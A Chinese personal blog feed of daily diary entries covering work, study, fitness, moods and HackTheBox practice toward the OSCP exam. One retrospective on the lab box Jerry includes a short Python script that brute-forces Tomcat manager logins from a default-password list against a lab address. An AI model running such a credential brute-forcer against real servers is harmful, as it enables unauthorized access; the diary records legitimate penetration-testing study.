说了要在2022/3/12前拿到OSCP那么就要在2022/3/12前拿到OSCP。

呵。吾等绝不会输，至少不会输给自己。

1. 上班

2. 继续学习《深入理解Java虚拟机》

3. HackTheBox Challenge 【ScriptKiddie】 再次努力了，再次没打掉

爆破了一天，没有爆掉。收手吧阿祖.jpg

4. SDL_GameControllerDB_Util发新版本

5. 康复

6. HackTheBox Challenge 【Netmon】 没看教程拿到user，看教程提权拿root

6.1 nmap

惯例nmap

展开全文 >>

……迄今为止的两三个月，我都在尝试去做太阳，变得更加美好，想去温暖一下别人，之类的

但是，已经没有什么做太阳的必要了

这个迭代的我，需要让自己开心起来

将别人作为生命的意义果然太过愚蠢，且会招致痛苦

但是，那也太美好了……

展开全文 >>

。。。今日为失去世界之日。
无须担心，吾只是回归了上个迭代。
从今天起的我，将再度仅为自己而活，仅此而已。
能从痛苦中获得快乐的人，面对自己的痛苦，也能够笑得出来，这才公平。。。是这样吧。
总之，今天是很悲伤的一天，但是我会继续往前走。
毕竟我好歹也是个方术师。
所以别太担心。
以上。

1. 上班

2. 感受痛苦

3. 自我迭代

1. 复盘2020/03/20的 HackTheBox Retired 【Jerry】，梳理失误点

1.1 gobuster滥用

实际上应该直接nmap出来是tomcat以后就上去草一下几个常用页面。

我当初的想法 是 很可能已经封了一些 所以直接gobuster看看有几个活着的

现在想想有点想多了

1.2 tomcat猜密码不应该手动，而应该上弱密码库上自动化件直接爆破

1.2.1 爆破脚本

（其实没什么技术含量 就是直接http了……）
但是写这里的话下次可以复（来）用（抄）

1
2
3
4
5
6
7
8
9
10

#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
for line in f:
c = line.strip('\n').split(":")
r = requests.get('http://10.10.10.95:8080/manager/html', auth=(c[0], c[1]))
if r.status_code == 200:
print "Found valid credentials \"" + line.strip('\n') + "\""
raise sys.exit()

展开全文 >>

今天极其疲倦。且心情不适。大概是因为太久没有充能……会早睡。

啊啊啊玩htb玩上头了！！！说好的早睡不见了！！！

1. 上班

2. 继续学习《设计模式之禅》

3. HackTheBox Challenge 【Weak RSA】打掉 (完全没看tutorial！)

直接搜索kali rsa，观察搜索结果，找出很多人推荐的轮子RsaCtfTool

从github获取安装和使用方式并使用即可

展开全文 >>

1. 上班

2. 继续学习《深入理解Java虚拟机》

3. 继续学习《设计模式之禅》

今天休息了下……累了

1. 上班

2. 参考commons-vfs人的意见重构bug暴露测试用例

https://github.com/apache/commons-vfs/pull/168

3. 继续学习《深入理解Java虚拟机》

4. 继续学习《设计模式之禅》

5. 学习1Z0-819相关课程若干

1. 上班

2. 塑形课

今天练习核心……被教练夸奖进步显著，开心

果然 很多事情 只要真的想要做到还是可以做到

再次确认了自己还没有弱到认真起来了还没法减肥的地步

……必须在今年内把双下巴剪掉，还有肚腩

腹肌的事情倒是不那么急 可以拖一拖

展开全文 >>

如果现在的自己还不行的话，那么就再努力些，然后再次挑战。

如果现在的努力程度还不够，那就再多努力些，然后再次挑战。

TRY HARDER.

1. 上班

2. 社区事务

3. 学习OSCP相关课程若干